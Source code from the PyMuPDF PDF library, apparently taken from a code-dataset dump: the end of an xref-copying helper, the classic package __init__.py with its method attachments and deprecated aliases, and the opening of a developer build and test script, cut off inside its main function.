    # If the source is a stream, copy its raw (still compressed) data first.
    if doc.xref_is_stream(source):
        raw = doc.xref_stream_raw(source)
        doc.update_stream(
            target,
            raw,
            compress=False,  # keeps source compression
            new=True,  # in case target is no stream
        )
    protected = keep if keep is not None else []
    # Null out every target key not explicitly protected.
    for key in doc.xref_get_keys(target):
        if key not in protected:
            doc.xref_set_key(target, key, "null")
    # Copy all 1st level source keys over to the target.
    for key in doc.xref_get_keys(source):
        _, value = doc.xref_get_key(source, key)
        doc.xref_set_key(target, key, value)
    return None
| 181,740 | Python | .py | 4,889 | 28.353242 | 203 | 0.538779 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,380 | __init__.py | pymupdf_PyMuPDF/src_classic/__init__.py | # ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
import sys
import glob
import os
if os.path.exists( 'fitz/__init__.py'):
    # Current directory holds a 'fitz' package without a compiled extension
    # module ('fitz/_fitz*') - typical for a PyMuPDF source tree. An
    # 'import fitz' would then pick up the incomplete package, so warn.
    if not glob.glob( 'fitz/_fitz*'):
        print( '#' * 40)
        print( '# Warning: current directory appears to contain an incomplete')
        print( '# fitz/ installation directory so "import fitz" may fail.')
        print( '# This can happen if current directory is a PyMuPDF source tree.')
        print( '# Suggest changing to a different current directory.')
        print( '#' * 40)
def message(text=''):
    """Print *text* (default: an empty line) to standard output."""
    print(text)
from fitz_old.fitz_old import *
# Allow this to work:
#   import fitz_old as fitz
#   fitz.fitz.TEXT_ALIGN_CENTER
#
fitz = fitz_old
# define the supported colorspaces for convenience
fitz_old.csRGB = fitz_old.Colorspace(fitz_old.CS_RGB)
fitz_old.csGRAY = fitz_old.Colorspace(fitz_old.CS_GRAY)
fitz_old.csCMYK = fitz_old.Colorspace(fitz_old.CS_CMYK)
csRGB = fitz_old.csRGB
csGRAY = fitz_old.csGRAY
csCMYK = fitz_old.csCMYK
# create the TOOLS object.
#
# Unfortunately it seems that this is never be destructed even if we use an
# atexit() handler, which makes MuPDF's Memento list it as a leak. In fitz_old.i
# we use Memento_startLeaking()/Memento_stopLeaking() when allocating
# the Tools instance so at least the leak is marked as known.
#
TOOLS = fitz_old.Tools()
TOOLS.thisown = True
fitz_old.TOOLS = TOOLS
# This atexit handler runs, but doesn't cause ~Tools() to be run.
#
import atexit
def cleanup_tools(TOOLS):
    """atexit handler: drop our references to the global Tools instance."""
    # print(f'cleanup_tools: TOOLS={TOOLS} id(TOOLS)={id(TOOLS)}')
    # print(f'TOOLS.thisown={TOOLS.thisown}')
    del TOOLS
    del fitz_old.TOOLS
atexit.register(cleanup_tools, TOOLS)
# Require that MuPDF matches fitz_old.TOOLS.mupdf_version(); also allow use with
# next minor version (e.g. 1.21.2 => 1.22), so we can test with mupdf master.
#
def v_str_to_tuple(s):
    """Convert a dotted version string like '1.21.2' to an int tuple."""
    return tuple(int(part) for part in s.split('.'))
def v_tuple_to_string(t):
    """Convert an int tuple like (1, 21, 2) to a dotted version string."""
    return '.'.join(str(item) for item in t)
# Required MuPDF version, plus the adjacent minor versions which are also
# accepted (e.g. required 1.21 -> prev 1.20, next 1.22; allows testing
# against MuPDF master).
mupdf_version_tuple = v_str_to_tuple(fitz_old.TOOLS.mupdf_version())
mupdf_version_tuple_required = v_str_to_tuple(fitz_old.VersionFitz)
mupdf_version_tuple_required_prev = (mupdf_version_tuple_required[0], mupdf_version_tuple_required[1]-1)
mupdf_version_tuple_required_next = (mupdf_version_tuple_required[0], mupdf_version_tuple_required[1]+1)
# copy functions in 'utils' to their respective fitz classes
# (pure-Python convenience methods are attached to the SWIG-generated
# core classes here, so they appear as normal methods to users)
import fitz_old.utils
from .table import find_tables
# ------------------------------------------------------------------------------
# General
# ------------------------------------------------------------------------------
fitz_old.recover_quad = fitz_old.utils.recover_quad
fitz_old.recover_bbox_quad = fitz_old.utils.recover_bbox_quad
fitz_old.recover_line_quad = fitz_old.utils.recover_line_quad
fitz_old.recover_span_quad = fitz_old.utils.recover_span_quad
fitz_old.recover_char_quad = fitz_old.utils.recover_char_quad
# ------------------------------------------------------------------------------
# Document
# ------------------------------------------------------------------------------
fitz_old.open = fitz_old.Document  # traditional alias: fitz.open(...)
fitz_old.Document._do_links = fitz_old.utils.do_links
fitz_old.Document.del_toc_item = fitz_old.utils.del_toc_item
fitz_old.Document.get_char_widths = fitz_old.utils.get_char_widths
fitz_old.Document.get_ocmd = fitz_old.utils.get_ocmd
fitz_old.Document.get_page_labels = fitz_old.utils.get_page_labels
fitz_old.Document.get_page_numbers = fitz_old.utils.get_page_numbers
fitz_old.Document.get_page_pixmap = fitz_old.utils.get_page_pixmap
fitz_old.Document.get_page_text = fitz_old.utils.get_page_text
fitz_old.Document.get_toc = fitz_old.utils.get_toc
fitz_old.Document.has_annots = fitz_old.utils.has_annots
fitz_old.Document.has_links = fitz_old.utils.has_links
fitz_old.Document.insert_page = fitz_old.utils.insert_page
fitz_old.Document.new_page = fitz_old.utils.new_page
fitz_old.Document.scrub = fitz_old.utils.scrub
fitz_old.Document.search_page_for = fitz_old.utils.search_page_for
fitz_old.Document.set_metadata = fitz_old.utils.set_metadata
fitz_old.Document.set_ocmd = fitz_old.utils.set_ocmd
fitz_old.Document.set_page_labels = fitz_old.utils.set_page_labels
fitz_old.Document.set_toc = fitz_old.utils.set_toc
fitz_old.Document.set_toc_item = fitz_old.utils.set_toc_item
fitz_old.Document.tobytes = fitz_old.Document.write
fitz_old.Document.subset_fonts = fitz_old.utils.subset_fonts
fitz_old.Document.get_oc = fitz_old.utils.get_oc
fitz_old.Document.set_oc = fitz_old.utils.set_oc
fitz_old.Document.xref_copy = fitz_old.utils.xref_copy
# ------------------------------------------------------------------------------
# Page
# ------------------------------------------------------------------------------
fitz_old.Page.apply_redactions = fitz_old.utils.apply_redactions
fitz_old.Page.delete_widget = fitz_old.utils.delete_widget
fitz_old.Page.draw_bezier = fitz_old.utils.draw_bezier
fitz_old.Page.draw_circle = fitz_old.utils.draw_circle
fitz_old.Page.draw_curve = fitz_old.utils.draw_curve
fitz_old.Page.draw_line = fitz_old.utils.draw_line
fitz_old.Page.draw_oval = fitz_old.utils.draw_oval
fitz_old.Page.draw_polyline = fitz_old.utils.draw_polyline
fitz_old.Page.draw_quad = fitz_old.utils.draw_quad
fitz_old.Page.draw_rect = fitz_old.utils.draw_rect
fitz_old.Page.draw_sector = fitz_old.utils.draw_sector
fitz_old.Page.draw_squiggle = fitz_old.utils.draw_squiggle
fitz_old.Page.draw_zigzag = fitz_old.utils.draw_zigzag
fitz_old.Page.get_links = fitz_old.utils.get_links
fitz_old.Page.get_pixmap = fitz_old.utils.get_pixmap
fitz_old.Page.get_text = fitz_old.utils.get_text
fitz_old.Page.get_image_info = fitz_old.utils.get_image_info
fitz_old.Page.get_text_blocks = fitz_old.utils.get_text_blocks
fitz_old.Page.get_text_selection = fitz_old.utils.get_text_selection
fitz_old.Page.get_text_words = fitz_old.utils.get_text_words
fitz_old.Page.get_textbox = fitz_old.utils.get_textbox
fitz_old.Page.insert_image = fitz_old.utils.insert_image
fitz_old.Page.insert_link = fitz_old.utils.insert_link
fitz_old.Page.insert_text = fitz_old.utils.insert_text
fitz_old.Page.insert_textbox = fitz_old.utils.insert_textbox
fitz_old.Page.new_shape = lambda x: fitz_old.utils.Shape(x)
fitz_old.Page.search_for = fitz_old.utils.search_for
fitz_old.Page.show_pdf_page = fitz_old.utils.show_pdf_page
fitz_old.Page.update_link = fitz_old.utils.update_link
fitz_old.Page.write_text = fitz_old.utils.write_text
fitz_old.Page.get_label = fitz_old.utils.get_label
fitz_old.Page.get_image_rects = fitz_old.utils.get_image_rects
fitz_old.Page.get_textpage_ocr = fitz_old.utils.get_textpage_ocr
fitz_old.Page.delete_image = fitz_old.utils.delete_image
fitz_old.Page.replace_image = fitz_old.utils.replace_image
fitz_old.Page.find_tables = find_tables
# ------------------------------------------------------------------------
# Annot
# ------------------------------------------------------------------------
fitz_old.Annot.get_text = fitz_old.utils.get_text
fitz_old.Annot.get_textbox = fitz_old.utils.get_textbox
# ------------------------------------------------------------------------
# Rect and IRect
# ------------------------------------------------------------------------
fitz_old.Rect.get_area = fitz_old.utils.get_area
fitz_old.IRect.get_area = fitz_old.utils.get_area
# ------------------------------------------------------------------------
# TextWriter
# ------------------------------------------------------------------------
fitz_old.TextWriter.fill_textbox = fitz_old.utils.fill_textbox
class FitzDeprecation(DeprecationWarning):
    """Warning category for PyMuPDF features removed after v1.19."""
def restore_aliases():
    '''
    Reinstate the deprecated camelCase aliases of the snake_case API.

    Each alias warns with FitzDeprecation when used (the warning text is
    suppressed while VersionBind starts with "1.18"); warnings are shown
    once per location via warnings.filterwarnings("once", ...).
    '''
    import warnings
    warnings.filterwarnings(
        "once",
        category=FitzDeprecation,
    )
    def showthis(msg, cat, filename, lineno, file=None, line=None):
        # Custom warning display: for FitzDeprecation warnings print only
        # the single-line message (without file/line context); everything
        # else is printed in the standard format.
        text = warnings.formatwarning(msg, cat, filename, lineno, line=line)
        s = text.find("FitzDeprecation")
        if s < 0:
            print(text, file=sys.stderr)
            return
        text = text[s:].splitlines()[0][4:]
        print(text, file=sys.stderr)
    warnings.showwarning = showthis
    def _alias(fitz_class, old, new):
        # Install attribute `old` on `fitz_class` as a deprecated alias of
        # the existing attribute `new`:
        #   - callables are wrapped so using the old name emits a warning
        #     (except on v1.18.*) before delegating;
        #   - properties are re-exposed as read-only properties;
        #   - anything else is assigned directly.
        # The alias __doc__ is prefixed with a deprecation notice.
        fname = getattr(fitz_class, new)
        r = str(fitz_class)[1:-1]
        objname = " ".join(r.split()[:2])
        objname = objname.replace("fitz_old.fitz_old.", "")
        objname = objname.replace("fitz_old.utils.", "")
        if callable(fname):
            def deprecated_function(*args, **kw):
                msg = "'%s' removed from %s after v1.19 - use '%s'." % (
                    old,
                    objname,
                    new,
                )
                if not VersionBind.startswith("1.18"):
                    warnings.warn(msg, category=FitzDeprecation)
                return fname(*args, **kw)
            setattr(fitz_class, old, deprecated_function)
        else:
            if type(fname) is property:
                setattr(fitz_class, old, property(fname.fget))
            else:
                setattr(fitz_class, old, fname)
        eigen = getattr(fitz_class, old)
        x = fname.__doc__
        if not x:
            x = ""
        try:
            if callable(fname) or type(fname) is property:
                eigen.__doc__ = (
                    "*** Deprecated and removed after v1.19 - use '%s'. ***\n" % new + x
                )
        except:
            # Some objects have read-only __doc__; silently keep the alias
            # without the deprecation prefix.
            pass
    # deprecated Document aliases
    _alias(fitz_old.Document, "chapterCount", "chapter_count")
    _alias(fitz_old.Document, "chapterPageCount", "chapter_page_count")
    _alias(fitz_old.Document, "convertToPDF", "convert_to_pdf")
    _alias(fitz_old.Document, "copyPage", "copy_page")
    _alias(fitz_old.Document, "deletePage", "delete_page")
    _alias(fitz_old.Document, "deletePageRange", "delete_pages")
    _alias(fitz_old.Document, "embeddedFileAdd", "embfile_add")
    _alias(fitz_old.Document, "embeddedFileCount", "embfile_count")
    _alias(fitz_old.Document, "embeddedFileDel", "embfile_del")
    _alias(fitz_old.Document, "embeddedFileGet", "embfile_get")
    _alias(fitz_old.Document, "embeddedFileInfo", "embfile_info")
    _alias(fitz_old.Document, "embeddedFileNames", "embfile_names")
    _alias(fitz_old.Document, "embeddedFileUpd", "embfile_upd")
    _alias(fitz_old.Document, "extractFont", "extract_font")
    _alias(fitz_old.Document, "extractImage", "extract_image")
    _alias(fitz_old.Document, "findBookmark", "find_bookmark")
    _alias(fitz_old.Document, "fullcopyPage", "fullcopy_page")
    _alias(fitz_old.Document, "getCharWidths", "get_char_widths")
    _alias(fitz_old.Document, "getOCGs", "get_ocgs")
    _alias(fitz_old.Document, "getPageFontList", "get_page_fonts")
    _alias(fitz_old.Document, "getPageImageList", "get_page_images")
    _alias(fitz_old.Document, "getPagePixmap", "get_page_pixmap")
    _alias(fitz_old.Document, "getPageText", "get_page_text")
    _alias(fitz_old.Document, "getPageXObjectList", "get_page_xobjects")
    _alias(fitz_old.Document, "getSigFlags", "get_sigflags")
    _alias(fitz_old.Document, "getToC", "get_toc")
    _alias(fitz_old.Document, "getXmlMetadata", "get_xml_metadata")
    _alias(fitz_old.Document, "insertPage", "insert_page")
    _alias(fitz_old.Document, "insertPDF", "insert_pdf")
    _alias(fitz_old.Document, "isDirty", "is_dirty")
    _alias(fitz_old.Document, "isFormPDF", "is_form_pdf")
    _alias(fitz_old.Document, "isPDF", "is_pdf")
    _alias(fitz_old.Document, "isReflowable", "is_reflowable")
    _alias(fitz_old.Document, "isRepaired", "is_repaired")
    _alias(fitz_old.Document, "isStream", "xref_is_stream")
    _alias(fitz_old.Document, "is_stream", "xref_is_stream")
    _alias(fitz_old.Document, "lastLocation", "last_location")
    _alias(fitz_old.Document, "loadPage", "load_page")
    _alias(fitz_old.Document, "makeBookmark", "make_bookmark")
    _alias(fitz_old.Document, "metadataXML", "xref_xml_metadata")
    _alias(fitz_old.Document, "movePage", "move_page")
    _alias(fitz_old.Document, "needsPass", "needs_pass")
    _alias(fitz_old.Document, "newPage", "new_page")
    _alias(fitz_old.Document, "nextLocation", "next_location")
    _alias(fitz_old.Document, "pageCount", "page_count")
    _alias(fitz_old.Document, "pageCropBox", "page_cropbox")
    _alias(fitz_old.Document, "pageXref", "page_xref")
    _alias(fitz_old.Document, "PDFCatalog", "pdf_catalog")
    _alias(fitz_old.Document, "PDFTrailer", "pdf_trailer")
    _alias(fitz_old.Document, "previousLocation", "prev_location")
    _alias(fitz_old.Document, "resolveLink", "resolve_link")
    _alias(fitz_old.Document, "searchPageFor", "search_page_for")
    _alias(fitz_old.Document, "setLanguage", "set_language")
    _alias(fitz_old.Document, "setMetadata", "set_metadata")
    _alias(fitz_old.Document, "setToC", "set_toc")
    _alias(fitz_old.Document, "setXmlMetadata", "set_xml_metadata")
    _alias(fitz_old.Document, "updateObject", "update_object")
    _alias(fitz_old.Document, "updateStream", "update_stream")
    _alias(fitz_old.Document, "xrefLength", "xref_length")
    _alias(fitz_old.Document, "xrefObject", "xref_object")
    _alias(fitz_old.Document, "xrefStream", "xref_stream")
    _alias(fitz_old.Document, "xrefStreamRaw", "xref_stream_raw")
    # deprecated Page aliases
    _alias(fitz_old.Page, "_isWrapped", "is_wrapped")
    _alias(fitz_old.Page, "addCaretAnnot", "add_caret_annot")
    _alias(fitz_old.Page, "addCircleAnnot", "add_circle_annot")
    _alias(fitz_old.Page, "addFileAnnot", "add_file_annot")
    _alias(fitz_old.Page, "addFreetextAnnot", "add_freetext_annot")
    _alias(fitz_old.Page, "addHighlightAnnot", "add_highlight_annot")
    _alias(fitz_old.Page, "addInkAnnot", "add_ink_annot")
    _alias(fitz_old.Page, "addLineAnnot", "add_line_annot")
    _alias(fitz_old.Page, "addPolygonAnnot", "add_polygon_annot")
    _alias(fitz_old.Page, "addPolylineAnnot", "add_polyline_annot")
    _alias(fitz_old.Page, "addRectAnnot", "add_rect_annot")
    _alias(fitz_old.Page, "addRedactAnnot", "add_redact_annot")
    _alias(fitz_old.Page, "addSquigglyAnnot", "add_squiggly_annot")
    _alias(fitz_old.Page, "addStampAnnot", "add_stamp_annot")
    _alias(fitz_old.Page, "addStrikeoutAnnot", "add_strikeout_annot")
    _alias(fitz_old.Page, "addTextAnnot", "add_text_annot")
    _alias(fitz_old.Page, "addUnderlineAnnot", "add_underline_annot")
    _alias(fitz_old.Page, "addWidget", "add_widget")
    _alias(fitz_old.Page, "cleanContents", "clean_contents")
    _alias(fitz_old.Page, "CropBox", "cropbox")
    _alias(fitz_old.Page, "CropBoxPosition", "cropbox_position")
    _alias(fitz_old.Page, "deleteAnnot", "delete_annot")
    _alias(fitz_old.Page, "deleteLink", "delete_link")
    _alias(fitz_old.Page, "deleteWidget", "delete_widget")
    _alias(fitz_old.Page, "derotationMatrix", "derotation_matrix")
    _alias(fitz_old.Page, "drawBezier", "draw_bezier")
    _alias(fitz_old.Page, "drawCircle", "draw_circle")
    _alias(fitz_old.Page, "drawCurve", "draw_curve")
    _alias(fitz_old.Page, "drawLine", "draw_line")
    _alias(fitz_old.Page, "drawOval", "draw_oval")
    _alias(fitz_old.Page, "drawPolyline", "draw_polyline")
    _alias(fitz_old.Page, "drawQuad", "draw_quad")
    _alias(fitz_old.Page, "drawRect", "draw_rect")
    _alias(fitz_old.Page, "drawSector", "draw_sector")
    _alias(fitz_old.Page, "drawSquiggle", "draw_squiggle")
    _alias(fitz_old.Page, "drawZigzag", "draw_zigzag")
    _alias(fitz_old.Page, "firstAnnot", "first_annot")
    _alias(fitz_old.Page, "firstLink", "first_link")
    _alias(fitz_old.Page, "firstWidget", "first_widget")
    _alias(fitz_old.Page, "getContents", "get_contents")
    _alias(fitz_old.Page, "getDisplayList", "get_displaylist")
    _alias(fitz_old.Page, "getDrawings", "get_drawings")
    _alias(fitz_old.Page, "getFontList", "get_fonts")
    _alias(fitz_old.Page, "getImageBbox", "get_image_bbox")
    _alias(fitz_old.Page, "getImageList", "get_images")
    _alias(fitz_old.Page, "getLinks", "get_links")
    _alias(fitz_old.Page, "getPixmap", "get_pixmap")
    _alias(fitz_old.Page, "getSVGimage", "get_svg_image")
    _alias(fitz_old.Page, "getText", "get_text")
    _alias(fitz_old.Page, "getTextBlocks", "get_text_blocks")
    _alias(fitz_old.Page, "getTextbox", "get_textbox")
    _alias(fitz_old.Page, "getTextPage", "get_textpage")
    _alias(fitz_old.Page, "getTextWords", "get_text_words")
    _alias(fitz_old.Page, "insertFont", "insert_font")
    _alias(fitz_old.Page, "insertImage", "insert_image")
    _alias(fitz_old.Page, "insertLink", "insert_link")
    _alias(fitz_old.Page, "insertText", "insert_text")
    _alias(fitz_old.Page, "insertTextbox", "insert_textbox")
    _alias(fitz_old.Page, "loadAnnot", "load_annot")
    _alias(fitz_old.Page, "loadLinks", "load_links")
    _alias(fitz_old.Page, "MediaBox", "mediabox")
    _alias(fitz_old.Page, "MediaBoxSize", "mediabox_size")
    _alias(fitz_old.Page, "newShape", "new_shape")
    _alias(fitz_old.Page, "readContents", "read_contents")
    _alias(fitz_old.Page, "rotationMatrix", "rotation_matrix")
    _alias(fitz_old.Page, "searchFor", "search_for")
    _alias(fitz_old.Page, "setCropBox", "set_cropbox")
    _alias(fitz_old.Page, "setMediaBox", "set_mediabox")
    _alias(fitz_old.Page, "setRotation", "set_rotation")
    _alias(fitz_old.Page, "showPDFpage", "show_pdf_page")
    _alias(fitz_old.Page, "transformationMatrix", "transformation_matrix")
    _alias(fitz_old.Page, "updateLink", "update_link")
    _alias(fitz_old.Page, "wrapContents", "wrap_contents")
    _alias(fitz_old.Page, "writeText", "write_text")
    # deprecated Shape aliases
    _alias(fitz_old.utils.Shape, "drawBezier", "draw_bezier")
    _alias(fitz_old.utils.Shape, "drawCircle", "draw_circle")
    _alias(fitz_old.utils.Shape, "drawCurve", "draw_curve")
    _alias(fitz_old.utils.Shape, "drawLine", "draw_line")
    _alias(fitz_old.utils.Shape, "drawOval", "draw_oval")
    _alias(fitz_old.utils.Shape, "drawPolyline", "draw_polyline")
    _alias(fitz_old.utils.Shape, "drawQuad", "draw_quad")
    _alias(fitz_old.utils.Shape, "drawRect", "draw_rect")
    _alias(fitz_old.utils.Shape, "drawSector", "draw_sector")
    _alias(fitz_old.utils.Shape, "drawSquiggle", "draw_squiggle")
    _alias(fitz_old.utils.Shape, "drawZigzag", "draw_zigzag")
    _alias(fitz_old.utils.Shape, "insertText", "insert_text")
    _alias(fitz_old.utils.Shape, "insertTextbox", "insert_textbox")
    # deprecated Annot aliases
    _alias(fitz_old.Annot, "getText", "get_text")
    _alias(fitz_old.Annot, "getTextbox", "get_textbox")
    _alias(fitz_old.Annot, "fileGet", "get_file")
    _alias(fitz_old.Annot, "fileUpd", "update_file")
    _alias(fitz_old.Annot, "getPixmap", "get_pixmap")
    _alias(fitz_old.Annot, "getTextPage", "get_textpage")
    _alias(fitz_old.Annot, "lineEnds", "line_ends")
    _alias(fitz_old.Annot, "setBlendMode", "set_blendmode")
    _alias(fitz_old.Annot, "setBorder", "set_border")
    _alias(fitz_old.Annot, "setColors", "set_colors")
    _alias(fitz_old.Annot, "setFlags", "set_flags")
    _alias(fitz_old.Annot, "setInfo", "set_info")
    _alias(fitz_old.Annot, "setLineEnds", "set_line_ends")
    _alias(fitz_old.Annot, "setName", "set_name")
    _alias(fitz_old.Annot, "setOpacity", "set_opacity")
    _alias(fitz_old.Annot, "setRect", "set_rect")
    _alias(fitz_old.Annot, "setOC", "set_oc")
    _alias(fitz_old.Annot, "soundGet", "get_sound")
    # deprecated TextWriter aliases
    _alias(fitz_old.TextWriter, "writeText", "write_text")
    _alias(fitz_old.TextWriter, "fillTextbox", "fill_textbox")
    # deprecated DisplayList aliases
    _alias(fitz_old.DisplayList, "getPixmap", "get_pixmap")
    _alias(fitz_old.DisplayList, "getTextPage", "get_textpage")
    # deprecated Pixmap aliases
    _alias(fitz_old.Pixmap, "setAlpha", "set_alpha")
    _alias(fitz_old.Pixmap, "gammaWith", "gamma_with")
    _alias(fitz_old.Pixmap, "tintWith", "tint_with")
    _alias(fitz_old.Pixmap, "clearWith", "clear_with")
    _alias(fitz_old.Pixmap, "copyPixmap", "copy")
    _alias(fitz_old.Pixmap, "getImageData", "tobytes")
    _alias(fitz_old.Pixmap, "getPNGData", "tobytes")
    _alias(fitz_old.Pixmap, "getPNGdata", "tobytes")
    _alias(fitz_old.Pixmap, "writeImage", "save")
    _alias(fitz_old.Pixmap, "writePNG", "save")
    _alias(fitz_old.Pixmap, "pillowWrite", "pil_save")
    _alias(fitz_old.Pixmap, "pillowData", "pil_tobytes")
    _alias(fitz_old.Pixmap, "invertIRect", "invert_irect")
    _alias(fitz_old.Pixmap, "setPixel", "set_pixel")
    _alias(fitz_old.Pixmap, "setOrigin", "set_origin")
    _alias(fitz_old.Pixmap, "setRect", "set_rect")
    _alias(fitz_old.Pixmap, "setResolution", "set_dpi")
    # deprecated geometry aliases
    _alias(fitz_old.Rect, "getArea", "get_area")
    _alias(fitz_old.IRect, "getArea", "get_area")
    _alias(fitz_old.Rect, "getRectArea", "get_area")
    _alias(fitz_old.IRect, "getRectArea", "get_area")
    _alias(fitz_old.Rect, "includePoint", "include_point")
    _alias(fitz_old.IRect, "includePoint", "include_point")
    _alias(fitz_old.Rect, "includeRect", "include_rect")
    _alias(fitz_old.IRect, "includeRect", "include_rect")
    _alias(fitz_old.Rect, "isInfinite", "is_infinite")
    _alias(fitz_old.IRect, "isInfinite", "is_infinite")
    _alias(fitz_old.Rect, "isEmpty", "is_empty")
    _alias(fitz_old.IRect, "isEmpty", "is_empty")
    _alias(fitz_old.Quad, "isEmpty", "is_empty")
    _alias(fitz_old.Quad, "isRectangular", "is_rectangular")
    _alias(fitz_old.Quad, "isConvex", "is_convex")
    _alias(fitz_old.Matrix, "isRectilinear", "is_rectilinear")
    _alias(fitz_old.Matrix, "preRotate", "prerotate")
    _alias(fitz_old.Matrix, "preScale", "prescale")
    _alias(fitz_old.Matrix, "preShear", "preshear")
    _alias(fitz_old.Matrix, "preTranslate", "pretranslate")
    # deprecated other aliases
    _alias(fitz_old.Outline, "isExternal", "is_external")
    _alias(fitz_old.Outline, "isOpen", "is_open")
    _alias(fitz_old.Link, "isExternal", "is_external")
    _alias(fitz_old.Link, "setBorder", "set_border")
    _alias(fitz_old.Link, "setColors", "set_colors")
    # NOTE(review): the following module-level aliases use bare `fitz`, not
    # `fitz_old` - presumably `fitz` is bound elsewhere in this module;
    # verify before relying on restore_aliases() at import time.
    _alias(fitz, "getPDFstr", "get_pdf_str")
    _alias(fitz, "getPDFnow", "get_pdf_now")
    _alias(fitz, "PaperSize", "paper_size")
    _alias(fitz, "PaperRect", "paper_rect")
    _alias(fitz, "paperSizes", "paper_sizes")
    _alias(fitz, "ImageProperties", "image_profile")
    _alias(fitz, "planishLine", "planish_line")
    _alias(fitz, "getTextLength", "get_text_length")
    _alias(fitz, "getTextlength", "get_text_length")
# Module docstring summarising the bound library versions and platform.
fitz_old.__doc__ = """
PyMuPDF %s: Python bindings for the MuPDF %s library.
Version date: %s.
Built for Python %i.%i on %s (%i-bit).
""" % (
    fitz_old.VersionBind,
    fitz_old.VersionFitz,
    fitz_old.VersionDate,
    sys.version_info[0],
    sys.version_info[1],
    sys.platform,
    64 if sys.maxsize > 2**32 else 32,
)
if VersionBind.startswith("1.19"):  # don't generate aliases after v1.19.*
    restore_aliases()
# Map of CSS-style color names to (r, g, b) float triples in 0..1.
pdfcolor = dict(
    [
        (k, (r / 255, g / 255, b / 255))
        for k, (r, g, b) in fitz_old.utils.getColorInfoDict().items()
    ]
)
__version__ = fitz_old.VersionBind
| 23,545 | Python | .py | 460 | 46.658696 | 104 | 0.661921 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,381 | test.py | pymupdf_PyMuPDF/scripts/test.py | #! /usr/bin/env python3
'''Developer build/test script for PyMuPDF.
Examples:
./PyMuPDF/scripts/test.py --mupdf mupdf buildtest
Build and test with pre-existing local mupdf/ checkout.
./PyMuPDF/scripts/test.py buildtest
Build and test with default internal download of mupdf.
./PyMuPDF/scripts/test.py --mupdf 'git:https://git.ghostscript.com/mupdf.git' buildtest
Build and test with internal checkout of mupdf master.
./PyMuPDF/scripts/test.py --mupdf 'git:--branch 1.24.x https://github.com/ArtifexSoftware/mupdf.git' buildtest
Build and test using internal checkout of mupdf 1.24.x branch from Github.
Usage:
scripts/test.py <options> <command(s)>
* Commands are handled in order, so for example `build` should usually be
before `test`.
* If we are not already running inside a Python venv, we automatically create a
venv and re-run ourselves inside it.
* We build directly with pip (unlike gh_release.py, which builds with
cibuildwheel).
* We run tests with pytest.
* One can generate call traces by setting environment variables in debug
builds. For details see:
https://mupdf.readthedocs.io/en/latest/language-bindings.html#environmental-variables
Options:
--help
-h
Show help.
-b <build>
Set build type for `build` or `buildtest` commands. `<build>` should
be one of 'release', 'debug', 'memento'. [This makes `build` set
environment variable `PYMUPDF_SETUP_MUPDF_BUILD_TYPE`, which is used by
PyMuPDF's `setup.py`.]
    -d
        Equivalent to `-b debug`.
-f 0|1
If 1 we also test alias `fitz` as well as `pymupdf`. Default is '0'.
-i <implementations>
Set PyMuPDF implementations to test.
<implementations> must contain only these individual characters:
'r' - rebased.
'R' - rebased without optimisations.
Default is 'r'. Also see `PyMuPDF:tests/run_compound.py`.
-k <expression>
Select which test(s) to run; passed straight through to pytest's `-k`.
-m <location> | --mupdf <location>
Location of local mupdf/ directory or 'git:...' to be used
when building PyMuPDF. [This sets environment variable
PYMUPDF_SETUP_MUPDF_BUILD, which is used by PyMuPDF/setup.py. If not
specified PyMuPDF will download its default mupdf .tgz.]
-p <pytest-options>
Set pytest options; default is ''.
-s 0 | 1
If 1 (the default), build with Python Limited API/Stable ABI.
-t <names>
Pytest test names, comma-separated. Should be relative to PyMuPDF
directory. For example:
-t tests/test_general.py
-t tests/test_general.py::test_subset_fonts.
To specify multiple tests, use comma-separated list and/or multiple `-t
<names>` args.
-v 0|1|2
0 - do not use a venv.
1 - Use venv. If it already exists, we assume the existing directory
was created by us earlier and is a valid venv containing all
necessary packages; this saves a little time.
2 - use venv.
The default is 2.
--build-isolation 0|1
If true (the default on non-OpenBSD systems), we let pip create and use
its own new venv to build PyMuPDF. Otherwise we force pip to use the
current venv.
--build-flavour <build_flavour>
Combination of 'p', 'b', 'd'. See ../setup.py's description of
PYMUPDF_SETUP_FLAVOUR. Default is 'pb', i.e. self-contained PyMuPDF
wheels without MuPDF build-time files.
--build-mupdf 0|1
Whether to rebuild mupdf when we build PyMuPDF. Default is 1.
--gdb 0|1
Run tests under gdb.
--system-site-packages 0|1
If 1, use `--system-site-packages` when creating venv.
--timeout <seconds>
Sets timeout when running tests.
--valgrind 0|1
Use valgrind in `test` or `buildtest`.
This will run `sudo apt update` and `sudo apt install valgrind`.
Commands:
build
Builds and installs PyMuPDF into venv, using `pip install .../PyMuPDF`.
buildtest
Same as 'build test'.
test
        Runs PyMuPDF's pytest tests in venv. By default only the rebased
        implementation is tested; use `-i` to change this.
wheel
Build wheel.
pyodide_wheel
Build Pyodide wheel. We clone `emsdk.git`, set it up, and run
`pyodide build`. This runs our setup.py with CC etc set up
to create Pyodide binaries in a wheel called, for example,
`PyMuPDF-1.23.2-cp311-none-emscripten_3_1_32_wasm32.whl`.
Environment:
PYMUDF_SCRIPTS_TEST_options
Is prepended to command line args.
'''
import gh_release
import glob
import os
import platform
import re
import shlex
import subprocess
import sys
import textwrap
pymupdf_dir = os.path.abspath( f'{__file__}/../..')
def main(argv):
    '''
    Command-line entry point.

    Parses options from environment variable PYMUDF_SCRIPTS_TEST_options
    (prepended) plus `argv[1:]`, then runs each requested command in order.
    Re-runs itself inside a venv if required.

    Removed dead locals that were assigned but never read
    (`s`, `build_do`, `i`).
    '''
    if github_workflow_unimportant():
        return
    if len(argv) == 1:
        show_help()
        return
    # Defaults for all options; see module docstring for their meaning.
    build_isolation = None
    valgrind = False
    build_type = None
    build_mupdf = True
    build_flavour = 'pb'
    gdb = False
    test_fitz = False
    implementations = 'r'
    test_names = list()
    venv = 2
    pytest_options = None
    timeout = None
    pytest_k = None
    system_site_packages = False
    options = os.environ.get('PYMUDF_SCRIPTS_TEST_options', '')
    options = shlex.split(options)
